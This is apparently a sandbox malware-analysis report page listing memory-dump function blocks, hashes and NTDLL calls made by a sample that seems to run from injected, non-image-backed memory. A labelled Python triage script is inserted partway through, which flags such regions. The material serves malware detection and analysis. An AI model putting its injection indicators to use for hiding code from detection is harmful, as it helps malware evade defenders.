                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c3124c0378375427628c9fb3db3c77a108cf116b4d1bb87e7675b4c130f175b
                                                                    • Instruction ID: f949cf35515c18d9bb02300b2a696cd0aa0e387b4398c17fc1604de45bea2d2d
                                                                    • Opcode Fuzzy Hash: 2c3124c0378375427628c9fb3db3c77a108cf116b4d1bb87e7675b4c130f175b
                                                                    • Instruction Fuzzy Hash: EB90027168500812D1507199842474A0055B7D0341FD1C411A0014A94DCB958A5576E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e812be9ae4e2d0f4663e70d55f90931b18f4c32a5efe6628048e3082f91b11e
                                                                    • Instruction ID: 67d823cb23cfafcdc1f6514ff19daf921d15144104c26b4d132a02b571038011
                                                                    • Opcode Fuzzy Hash: 7e812be9ae4e2d0f4663e70d55f90931b18f4c32a5efe6628048e3082f91b11e
                                                                    • Instruction Fuzzy Hash: 7490027128100852D10071998414B4A0055B7E0341FD1C416A0114A94DCA55C8517561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: bd30c2fc23e8f006bc30ad52b71b1a1788f3b01b5ef70963575f5b054f246dbe
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015EFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015EFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015EFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: f96722b438a547855ad2604f9cded8822ca0cd262a345a9eafbe0bf2515014d6
                                                                    • Instruction ID: 5bb7908d06d85b184b983d2cb5c82d80894548554108b4ed1ff1dcf7d4cb22db
                                                                    • Opcode Fuzzy Hash: f96722b438a547855ad2604f9cded8822ca0cd262a345a9eafbe0bf2515014d6
                                                                    • Instruction Fuzzy Hash: 33F0FC765402027FE6251A45DC05F237F9AFB84774F140315F6185E1D1EA62F83086F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,03323BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03323BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0332863D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                                                                    • Instruction ID: 883da2669258dde8695ef0a6a15f113ffff8a21d84c963060ec98784dd135565
                                                                    • Opcode Fuzzy Hash: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                                                                    • Instruction Fuzzy Hash: D501AFB2610208AFCB48CF98DC84EEB77A9AF9C754F158248BA0DD7241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,03323BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03323BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0332863D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: bfa04bc67d995aa34b893d074883a5fb996c447c95e2b86d328ad1857cd91927
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 8FF0BDB2200208ABCB08CF89DC84EEB77ADAF8C754F158248BA0D97241C630F811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                                                                    • Instruction ID: 27ca8d32ce525e4c2615505542a43ef9f7795621dd8b8ef98736005e1800fbc9
                                                                    • Opcode Fuzzy Hash: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                                                                    • Instruction Fuzzy Hash: 7A21EAB6214118ABCB18DF99DC84EEB77A9AF8C354F158248BA0DA7241C630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                                                                    • Instruction ID: d08b2f78b45996c6259c37064f1c78128d0b6b7c6c7a36ad057aa8c99e9e6a39
                                                                    • Opcode Fuzzy Hash: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                                                                    • Instruction Fuzzy Hash: 3CF0A4B6600208ABCB14DF99DC84EEB77ADAF8C754F158649BE1D97241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: 17ed33efa527112f5490024830bee27f29ba8191ff3d3209f4beeb91f737f363
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 1BF0A4B6200208ABCB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03312D11,00002000,00003000,00000004), ref: 03328809
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: 51f5d26dda36e2c3a01a90b841c9e75f921d8fa6a11bf23a7a68469803bcefa5
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: 84F015B6200218ABCB14DF89CC80EAB77ADAF88650F118148BE0897241C630F810CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03312D11,00002000,00003000,00000004), ref: 03328809
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 8e25fd84456c6487ab96bf642f5072ad90049e3f9967c26ad219bfd6177ddda4
                                                                    • Instruction ID: 6aa9d0d0b82d3146de740d04e00705036ca76ed7b788c0b9b3b8a790e4e220e0
                                                                    • Opcode Fuzzy Hash: 8e25fd84456c6487ab96bf642f5072ad90049e3f9967c26ad219bfd6177ddda4
                                                                    • Instruction Fuzzy Hash: B8F01CB6200258AFDB14DF89CC84EA77BA9FF8C350F158549FE599B241C630E820CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(03323D60,?,?,03323D60,00000000,FFFFFFFF), ref: 03328745
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: a6a1dd7b7f348ffd32a4af2d66e60d5731d63b98615c46e7a0676fbc0be5a180
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: F4D01776600318ABD710EB99CC89FA77BACEF48660F154499BA189B242C630FA1086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
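
The "Executed Functions" blocks above are the part of this listing worth reading closely: process 00000011 calls NtCreateFile, NtReadFile, NtAllocateVirtualMemory and NtClose straight from NTDLL out of a region at 03310000 that is "based on PE: false" and carries Yara matches, while the region at 01530000 in process 00000007 is image-backed and carries ntdll's RTL critical-section diagnostic strings. The following Python is an added triage example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling: it parses blocks in the format shown here, groups them by dump region, and flags regions that call NTDLL natives from memory that is not backed by a PE image on disk. SAMPLE is a constructed excerpt of three blocks copied from this page and trimmed to the lines the parser uses. Two things are assumptions rather than facts stated on the page: the first dotted field of the .sdmp name is treated as the process number, and the NtAllocateVirtualMemory decoding matches raw hex values against MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_READWRITE (0x04) by value only, because the listing prints stack values without parameter names.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt: three function blocks copied from the listing on this page.
SAMPLE = """
• NtCreateFile.NTDLL(00000060,00000000,.z`,03323BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03323BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0332863D
Memory Dump Source
• Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
Yara matches
• API ID: CreateFile
• Instruction Fuzzy Hash: D501AFB2610208AFCB48CF98DC84EEB77A9AF9C754F158248BA0DD7241D630E811CBA0
Uniqueness Score: -1.00%

• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03312D11,00002000,00003000,00000004), ref: 03328809
• Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
Yara matches
• Instruction Fuzzy Hash: 84F015B6200218ABCB14DF89CC80EAB77ADAF88650F118148BE0897241C630F810CBA0
Uniqueness Score: -1.00%

• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015EFDFA
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
• Instruction Fuzzy Hash: 33F0FC765402027FE6251A45DC05F237F9AFB84774F140315F6185E1D1EA62F83086F5
Uniqueness Score: -1.00%
"""

# Call sites: '<api>.<MODULE>(<stack values>), ref: <addr>' or '<symbol>.LIBCMT ref: <addr>'.
API_RE = re.compile(r"^•?\s*(?P<name>\S+?)\.(?P<module>[A-Z]+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash:\s*(?P<h>[0-9A-Fa-f]+)")

# Matched by exact value only (assumption: the listing does not label parameter
# positions). 0x2000 stays unnamed: it is MEM_RESERVE but also a plausible RegionSize.
KNOWN_FLAGS = {0x3000: "MEM_COMMIT|MEM_RESERVE", 0x1000: "MEM_COMMIT",
               0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Function:
    calls: list = field(default_factory=list)  # (api, module, args, ref)
    dump: str = ""
    base: int = 0
    pe_backed: bool = True
    yara: bool = False
    fuzzy: str = ""


def parse_functions(text):
    """One Function per block; a block ends at its 'Uniqueness Score' line."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := API_RE.match(line):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append((m["name"], m["module"], args, m["ref"]))
        elif m := SRC_RE.search(line):
            cur.dump, cur.base = m["dump"], int(m["base"], 16)
            cur.pe_backed = m["pe"] == "true"
        elif line == "Yara matches":
            cur.yara = True
        elif m := FUZZY_RE.search(line):
            cur.fuzzy = m["h"]
        elif line.startswith("Uniqueness Score"):
            funcs.append(cur)
            cur = Function()
    return funcs


def decode_alloc(args):
    """Name the allocation constants visible in an NtAllocateVirtualMemory stack dump."""
    vals = {int(a, 16) for a in args if re.fullmatch(r"[0-9A-Fa-f]+", a)}  # skips '?' and .z`
    return {KNOWN_FLAGS[v] for v in vals if v in KNOWN_FLAGS}


def triage(funcs):
    """Group by (process number, region base); flag NTDLL calls from non-PE-backed memory."""
    regions = defaultdict(lambda: {"functions": 0, "pe_backed": True, "yara": False,
                                   "ntdll_calls": set(), "alloc_flags": set()})
    for f in funcs:
        # Assumption: first dotted field of the .sdmp name is the process number.
        r = regions[(f.dump.split(".")[0], f.base)]
        r["functions"] += 1
        r["pe_backed"] = f.pe_backed
        r["yara"] |= f.yara
        for api, module, args, _ in f.calls:
            if module == "NTDLL":
                r["ntdll_calls"].add(api)
            if api == "NtAllocateVirtualMemory":
                r["alloc_flags"] |= decode_alloc(args)
    for r in regions.values():
        r["suspect"] = bool(r["ntdll_calls"]) and not r["pe_backed"]
    return dict(regions)


if __name__ == "__main__":
    for (proc, base), r in triage(parse_functions(SAMPLE)).items():
        tag = "INJECTED?" if r["suspect"] else "image-backed"
        print(f"proc {proc} @ {base:08X} [{tag}] yara={r['yara']} "
              f"ntdll={sorted(r['ntdll_calls'])} alloc={sorted(r['alloc_flags'])}")
```

Run it over the saved text of a report page instead of SAMPLE to get one line per dump region. A region flagged INJECTED? that also has Yara matches, such as process 00000011 at 03310000 here, is the one to carve the payload from; image-backed regions such as 01530000 in process 00000007 are loaded modules and are noise for that purpose. The NtAllocateVirtualMemory decode only tells you which well-known constants appear on the stack, not which parameter each one belongs to.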

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 32cfee49e2ee0085456737b8b2aeb0b9bd3b2b04d0da39736cf024dc0b977104
                                                                    • Instruction ID: 01a1bdb619394ec8905b334221a3e96db76c620cde2599690da622f0c1d513ad
                                                                    • Opcode Fuzzy Hash: 32cfee49e2ee0085456737b8b2aeb0b9bd3b2b04d0da39736cf024dc0b977104
                                                                    • Instruction Fuzzy Hash: 65900265211000030109A9990745507006A97D53A1391D121F1005654CE6A18861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 151537208db3adb6d79fc19c6e79dc469b34d84198ce67d71c995be3efeb0580
                                                                    • Instruction ID: c69be5048efbaf2be1611b9de128ca08506d377f77a7529386c1556fcf3cfe8b
                                                                    • Opcode Fuzzy Hash: 151537208db3adb6d79fc19c6e79dc469b34d84198ce67d71c995be3efeb0580
                                                                    • Instruction Fuzzy Hash: 799002A120200003410975994455617402E97E0251B91D121E1004694DD5A58891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2b40e53409cafd3fd67373fedf6bfb2ad0e97a914ad270ec8ae314d74e9ead2b
                                                                    • Instruction ID: 49cd3abb0f832d2067fa82c679e1a09aad329f27cdb7d184e09e7038e1c79d12
                                                                    • Opcode Fuzzy Hash: 2b40e53409cafd3fd67373fedf6bfb2ad0e97a914ad270ec8ae314d74e9ead2b
                                                                    • Instruction Fuzzy Hash: 7790027120100402D10469D95449647002997E0351F91E111A5014659ED6E58891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 70d21bb18dd9cdbdb1e8143ed9d1d28a34162fccd60f92e268407c583c8fd1a9
                                                                    • Instruction ID: 35430f4e8831ad8c48ed9def0d3cfe9af262fd840be13315e23c23f3c470ceff
                                                                    • Opcode Fuzzy Hash: 70d21bb18dd9cdbdb1e8143ed9d1d28a34162fccd60f92e268407c583c8fd1a9
                                                                    • Instruction Fuzzy Hash: 4990027131114402D11465998445707002997D1251F91D511A081465CD96D58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0ec81de389eda2aa71c2bf25f0756c7434106b0da6bfee5f76260db3cae878f6
                                                                    • Instruction ID: a3811439181abed9e818ebbcb8310c2907521694fe75915ee03e33bee79bc5b5
                                                                    • Opcode Fuzzy Hash: 0ec81de389eda2aa71c2bf25f0756c7434106b0da6bfee5f76260db3cae878f6
                                                                    • Instruction Fuzzy Hash: C190026921300002D1847599544960B002997D1252FD1E515A000565CCD9958869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: deead70040d2e4bc9da3520716dd64da9556e80867e2e777f4c15fe63662329a
                                                                    • Instruction ID: 56179e60b2a6233222294bd9a9880e05a58cd217952a086748923098c9e06053
                                                                    • Opcode Fuzzy Hash: deead70040d2e4bc9da3520716dd64da9556e80867e2e777f4c15fe63662329a
                                                                    • Instruction Fuzzy Hash: 8B90027120504842D14475994445A47003997D0355F91D111A0054798DA6A58D55F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e9187e79293386cc723050688ed43293ae458d487abba52d674f2d0903ec84de
                                                                    • Instruction ID: 2df1ec5e86cb748f0f251d71016d87fca50318ba7be11a2293828283c8ee0831
                                                                    • Opcode Fuzzy Hash: e9187e79293386cc723050688ed43293ae458d487abba52d674f2d0903ec84de
                                                                    • Instruction Fuzzy Hash: 6790027120100802D1847599444564B002997D1351FD1D115A0015758DDA958A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 05a08a14b34042d7baa21ce55b1ce2cb997a6676dc15800ba98d67a34e9789b2
                                                                    • Instruction ID: f9912cb6721b7d4b8397707d721ac6ba1ec0d09e9f10c1b23002debcb6866e37
                                                                    • Opcode Fuzzy Hash: 05a08a14b34042d7baa21ce55b1ce2cb997a6676dc15800ba98d67a34e9789b2
                                                                    • Instruction Fuzzy Hash: DB90027120100842D10465994445B47002997E0351F91D116A0114758D9695C851B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1a7da3734891d3fe0ba868bc323345fcf77fa971a8fb85b36b33c6b8810ab060
                                                                    • Instruction ID: cc221e70caa9e5e7822271bd06d2b05b35921a3fda58b7c0d82ea606cdd08979
                                                                    • Opcode Fuzzy Hash: 1a7da3734891d3fe0ba868bc323345fcf77fa971a8fb85b36b33c6b8810ab060
                                                                    • Instruction Fuzzy Hash: E790027120108802D1146599844574B002997D0351F95D511A441475CD96D58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: eb13d39d93019f708e373dc272f04a0099ec07ba6dcb10b159742234c5c25cc2
                                                                    • Instruction ID: becefce2320cc945e726f718512383a9976839dddc23732e2697e4c624447f1d
                                                                    • Opcode Fuzzy Hash: eb13d39d93019f708e373dc272f04a0099ec07ba6dcb10b159742234c5c25cc2
                                                                    • Instruction Fuzzy Hash: 799002B120100402D14475994445747002997D0351F91D111A5054658E96D98DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 45e749a058222ce9673e63db9dff9ef30fce3dce885900e9a2c2049aa5e25921
                                                                    • Instruction ID: fe2a0dfa2f17c642e976a4a0a98d12e3b6c575f99d4ef5d80fbd9d19ba970e28
                                                                    • Opcode Fuzzy Hash: 45e749a058222ce9673e63db9dff9ef30fce3dce885900e9a2c2049aa5e25921
                                                                    • Instruction Fuzzy Hash: 2C9002A134100442D10465994455B070029D7E1351F91D115E1054658D9699CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b113b3b623b68f4ded9af303a14aa065fa129e02cc8feb8d23509fa288eb957c
                                                                    • Instruction ID: f3019a8860630987eae437e80921a377452ecbded555b3f31a0529db3fcd5fb9
                                                                    • Opcode Fuzzy Hash: b113b3b623b68f4ded9af303a14aa065fa129e02cc8feb8d23509fa288eb957c
                                                                    • Instruction Fuzzy Hash: 9D900261242041525549B5994445507402AA7E02917D1D112A1404A54C95A69856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
